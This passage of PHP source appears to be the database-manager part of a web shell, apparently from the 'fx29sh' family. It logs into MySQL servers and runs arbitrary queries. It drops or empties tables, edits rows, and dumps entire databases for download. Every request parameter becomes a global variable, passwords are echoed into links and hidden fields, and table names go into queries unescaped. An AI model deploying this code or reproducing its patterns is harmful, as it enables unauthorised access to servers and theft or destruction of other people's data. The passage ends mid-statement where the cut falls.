else { $error = mysql_error(); }
$error = htmlspecialchars($error);
return $error;
}
function mysql_query_form() {
global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
if ((!$submit) or ($sql_x)) {
echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
if ($tbl_struct) {
echo "<td valign=\"top\"><b>Fields:</b><br>";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
echo "</td></tr></table>";
}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
function mysql_create_db($db,$sock="") {
$sql = "CREATE DATABASE `".addslashes($db)."`;";
if ($sock) {return mysql_query($sql,$sock);}
else {return mysql_query($sql);}
}
function mysql_query_parse($query) {
$query = trim($query);
$arr = explode (" ",$query);
$types = array(
"SELECT"=>array(3,1),
"SHOW"=>array(2,1),
"DELETE"=>array(1),
"DROP"=>array(1)
);
$result = array();
$op = strtoupper($arr[0]);
if (is_array($types[$op])) {
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2) {
foreach($arr as $k=>$v) {
if (strtoupper($v) == "LIMIT") {
$result["limit"] = $arr[$k+1];
$result["limit"] = explode(",",$result["limit"]);
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
unset($arr[$k],$arr[$k+1]);
}
}
}
}
else { return FALSE; }
}
function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
function html_style() {
$style = ' <style type="text/css"> a { text-decoration:none; } a:hover { color: #00ff00; border-bottom:1px solid #00ff00; } input[type="text"], input[type="password"], select{ background:#111111; border:0; padding:2px; border:1px solid #444444; } input[type="submit"]{ background:#111111; color:#ffffff; margin:0 4px; border:1px solid #444444;} input[type="text"]:hover, input[type="submit"]:hover, input[type="password"]:hover, select:hover{ border-bottom:1px solid #00ff00;border-top:1px solid #00ff00;} .tab { width:100%; } th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .tub { width:100%; } .tub th{ border-bottom:1px solid #00ff00; padding:3px;} .tub tr:hover{ background:#006400; } .tub td{ border-bottom:1px solid #333333; padding-left:3px; } #maininfo { padding:5px; margin-top:10px; margin-left:2px; margin-right:2px; background:#191919; } #maininfo a{ color:#00ff00; } textarea { background:#000000; border:1px solid #444444;} textarea:hover { border:1px solid #00ff00;} </style><center>';
return $style;
}
$auto_surl = TRUE;
foreach ($_REQUEST as $k => $v) {
if (!isset($$k)) { $$k = $v; }
}
if ($auto_surl) {
$include = "&";
foreach (explode("&",getenv("QUERY_STRING")) as $v) {
$v= explode("=",$v);
$name= urldecode($v[0]);
$value= @urldecode($v[1]);
$needles = array("http://","https://","ssl://","ftp://","\\\\");
foreach ($needles as $needle) {
if (strpos($value,$needle) === 0) {
$includestr .= urlencode($name)."=".urlencode($value)."&";
} } } }
if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
if (!isset($x)) { $x = "sql"; }
if ($x == "sql") {
foreach (array("sort","sql_sort") as $v) {
if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
}
if ($sort_save) {
if (!empty($sort)) { setcookie("sort",$sort); }
if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
}
if (!isset($sort)) { $sort = $sort_default; }
$sort = htmlspecialchars($sort);
$sort[1] = strtolower($sort[1]);
echo html_style();
echo "<div id='maininfo'>";
if ($x == "sql") {
$sql_surl = $surl."x=sql";
if (!isset($sql_login)) { $sql_login = ""; }
if (!isset($sql_passwd)) { $sql_passwd = ""; }
if (!isset($sql_server)) { $sql_server = ""; }
if (!isset($sql_port)) { $sql_port = ""; }
if (!isset($sql_tbl)) { $sql_tbl = ""; }
if (!isset($sql_x)) { $sql_x = ""; }
if (!isset($sql_tbl_x)) { $sql_tbl_x = ""; }
if (!isset($sql_order)) { $sql_order = ""; }
if (!isset($sql_x)) { $sql_x = ""; }
if (!isset($sql_getfile)) { $sql_getfile = ""; }
if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
if (@$sql_port){ $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
$sql_surl .= "&";
echo "";
if (@$sql_server) {
$sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_smarterror($sql_sock);
@mysql_select_db($sql_db,$sql_sock);
if (@$sql_query and $submit) {
$sql_query_result = mysql_query($sql_query,$sql_sock);
$sql_query_error = mysql_smarterror($sql_sock);
}
}
else { $sql_sock = FALSE; }
if (!$sql_sock) {
if (!@$sql_server) { echo "<blink><b><font style= color:#ff0000>No Connection ! ! !</font></b></blink>"; }
else { disp_error("ERROR: ".$err); }
}
else {
#SQL Quicklaunch
$sqlquicklaunch= array();
$sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
$sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
$sqlquicklaunch[] = array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
$sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
$sqlquicklaunch[] = array("Logout",$surl."x=sql");
echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
if (count($sqlquicklaunch) > 0) {
foreach($sqlquicklaunch as $item) {
echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
}
}
}
echo "</div>";
echo "<center><table class='tab'><tr>";
if (!$sql_sock) {
echo '<td>
<form name="f_sql" action="'.$surl.'x=sql" method="POST">
<input type="hidden" name="x" value="sql">
<table class="tabnet" style="padding:1px;">
<tr><th colspan="2">Mysql Manager</th></tr>
<tr><td>Host</td><td><input type="text" name="sql_server" class="inputz" style="width:249px;" value="localhost"></td></tr>
<tr><td>Username</td><td><input type="text" name="sql_login" class="inputz" value="" style="width:249px;"></td></tr>
<tr><td>Password</td><td><input type="password" name="sql_passwd" class="inputz" value="" style="width:249px;"></td></tr>
<tr><td>Database</td><td><input type="text" name="sql_db" value="" class="inputz" style="width:249px;"></td></tr>
<tr><td>Port</td><td><input type="text" name="sql_port" class="inputz" value="3306" size="6"> <input type="submit" class="inputzbut" value="Connect"></td></tr>
</table>
</form>';
}
else {
echo '<td valign="top" style="border:1px solid #333333;">
<center>
<a href="'.$sql_surl.'"><b style="color:#00ff00;">HOME</b></a>
<hr size="1" noshade>';
$result = mysql_list_dbs($sql_sock);
if (!$result) { echo mysql_smarterror(); }
else {
echo '<form action="'.$surl.'x=sql">
<input type="hidden" name="x" value="sql">
<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
<select name="sql_db" onchange="this.form.submit()" style="width:100%;">';
$c = 0;
$dbs = "";
while ($row = mysql_fetch_row($result)) {
$dbs .= "\t\t<option value=\"".$row[0]."\"";
if (@$sql_db == $row[0]) { $dbs .= " selected"; }
$dbs .= ">".$row[0]."</option>\n";
$c++;
}
echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
echo $dbs;
}
echo '</select>
<hr size="1" noshade>
</form>
</center>';
if (isset($sql_db)) {
$result = mysql_list_tables($sql_db);
if (!$result) {
$result = mysql_list_dbs($sql_sock);
$num = mysql_num_rows($result);
for( $i = 0; $i < $num; $i++ ) {
$dbname = mysql_dbname( $result, $i );
echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\">$dbname</a></b></td></table>"; } }
else {
echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br>\n";
$c = 0;
while ($row = mysql_fetch_array($result)) {
$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
$count_row = mysql_fetch_array($count);
echo "\t<b>+ <a style='color:#00ff00;' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
mysql_free_result($count);
$c++;
}
if (!$c) { echo "No tables found in database"; }
}
}
echo '</td>';
echo '<td style="border:1px solid #333333;">';
$diplay = TRUE;
if (@$sql_db) {
if (!is_numeric($c)) { $c = 0; }
if ($c == 0) { $c = "no"; }
echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
if (count(@$dbquicklaunch) > 0) {
foreach($dbsqlquicklaunch as $item) {
echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
}
}
echo "</b></center>\n";
$xs = array("","dump");
if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
elseif ($sql_tbl_x == "insert") {
if ($sql_tbl_insert_radio == 1) {
$keys = "";
$akeys = array_keys($sql_tbl_insert);
foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_x = "query";
$sql_tbl_x = "browse";
}
elseif ($sql_tbl_insert_radio == 2) {
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
$result = mysql_query($sql_query) or print(mysql_smarterror());
$result = mysql_fetch_array($result, MYSQL_ASSOC);
$sql_x = "query";
$sql_tbl_x = "browse";
}
}
if ($sql_x == "query") {
echo "<hr size=\"1\" noshade>";
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
if ((!$submit) or ($sql_x)) { echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
}
if (in_array($sql_x,$xs)) {
echo '<table class="tab">
<tr>
<td style="border:1px solid #333333;padding:3px;">
<b>Create new table:</b>
<form action="'.$surl.'">
<input type="hidden" name="x" value="sql">
<input type="hidden" name="sql_x" value="newtbl">
<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
<input type="text" name="sql_newtbl" size="20">
Fields: <input type="text" name="sql_field" size="3">
<input class="inputzbut" type="submit" value="Create">
</form>
</td>
<td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
<form action="'.$surl.'">
<input type="hidden" name="x" value="sql">
<input type="hidden" name="sql_x" value="dump">
<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
<input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql">
<input type="submit" class="inputzbut" name="submit" value="Dump">
</form>
</td>
</tr>
</table>';
if (!empty($sql_x)) { echo "<hr size=\"1\" noshade>"; }
if ($sql_x == "newtbl") {
echo "<b>";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
}
else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
}
elseif ($sql_x == "dump") {
if (empty($submit)) {
$diplay = FALSE;
echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
$v = join (";",$dmptbls);
echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
if ($dump_file) {$tmp = $dump_file;}
else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
echo "<br><br><input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"Dump\">";
echo "</form>";
}
else {
$diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0;
$set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array();
if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
$ret = mysql_dump($set);
if ($sql_dump_download) {
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($ret));
header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
echo $ret;
exit;
}
elseif ($sql_dump_savetofile) {
$fp = fopen($sql_dump_file,"w");
if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
else {
fwrite($fp,$ret);
fclose($fp);
echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
}
}
else {echo "<b>Dump: nothing to do!</b>";}
}
}
if ($diplay) {
if (!empty($sql_tbl)) {
if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
$count_row = mysql_fetch_array($count);
mysql_free_result($count);
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
$tbl_struct_fields = array();
while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
$perpage = $sql_tbl_le - $sql_tbl_ls;
if (!is_numeric($perpage)) { $perpage = 10; }
$numpages = $count_row[0]/$perpage;
$e = explode(" ",$sql_order);
if (count($e) == 2) {
if ($e[0] == "d") { $asc_desc = "DESC"; }
else { $asc_desc = "ASC"; }
$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
}
else {$v = "";}
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
$result = mysql_query($query) or print(mysql_smarterror());
echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
echo "<hr size=\"1\" noshade>";
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> &nbsp; ";
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> &nbsp; ";
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> &nbsp; ";
echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a> &nbsp; ";
if ($sql_tbl_x == "structure") { echo "<b>Under construction!</b>"; }
if ($sql_tbl_x == "insert") {
if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
else {
echo "<br><br><b>Inserting row into table:</b><br>";
if (!empty($sql_tbl_insert_q)) {
$sql_query = "SELECT * FROM `".$sql_tbl."`";
$sql_query .= " WHERE".$sql_tbl_insert_q;
$sql_query .= " LIMIT 1;";
$result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
$values = mysql_fetch_assoc($result);
mysql_free_result($result);
}
else {$values = array();}
echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
foreach ($tbl_struct_fields as $field) {
$name = $field["Field"];
if (empty($sql_tbl_insert_q)) {$v = "";}
echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
$i++;
}
echo "</table><br>";
echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
echo "<br><br><input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form>";
}
}
if ($sql_tbl_x == "browse") {
$sql_tbl_ls = abs($sql_tbl_ls);
$sql_tbl_le = abs($sql_tbl_le);
echo "<hr size=\"1\" noshade>";
echo "<b>Page: </b>";
$b = 0;
for($i=0;$i<$numpages;$i++) {
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
echo $i;
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
else { echo " "; }
}
if ($i == 0) {echo "empty";}
echo "<br><br><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
echo "<br><form method=\"POST\">\n";
echo "<table class='tub'><tr>";
echo "<th><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></th>";
for ($i=0;$i<mysql_num_fields($result);$i++) {
$v = mysql_field_name($result,$i);
if ($e[0] == "a") {$s = "d"; $m = "asc";}
else {$s = "a"; $m = "desc";}
echo "<th>";
if (empty($e[0])) {$e[0] = "a";}
if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
echo "</th>";
}
echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
echo "</tr>";
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
echo "<tr>";
$w = "";
$i = 0;
foreach ($row as $k=>$v) {
$name = mysql_field_name($result,$i);
$w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
}
if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
echo "<td align='center' style='padding:0px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
$i = 0;
foreach ($row as $k=>$v) {
$v = htmlspecialchars($v);
if ($v == "") { $v = "<font color=\"#00FF00\">NULL</font>"; }
echo "<td>".$v."</td>";
$i++;
}
echo "<td>";
echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
echo "&nbsp;|&nbsp;";
echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
echo "</td>";
echo "</tr>";
}
mysql_free_result($result);
echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\"/> <select name=\"sql_x\">";
echo "<option value=\"\">With selected:</option>";
echo "<option value=\"deleterow\">Delete</option>";
echo "</select> <input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form></p>";
}
}
else {
$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
if (!$result) { echo mysql_smarterror(); }
else {
echo '<form method="POST">
<table class="tub">
<tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
$i = 0;
$tsize = $trows = 0;
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$tsize += $row["Data_length"];
$trows += $row["Rows"];
$size = view_size($row["Data_length"]);
echo'<tr>
<td align="center" style="padding:0px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'"></td>
<td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'"><b>'.$row["Name"].'</b></a></td>
<td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
<td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a>&nbsp;|&nbsp;<a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a>&nbsp;|&nbsp;<a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
</tr>';
$i++;
}
echo "\t\t<tr>\n".
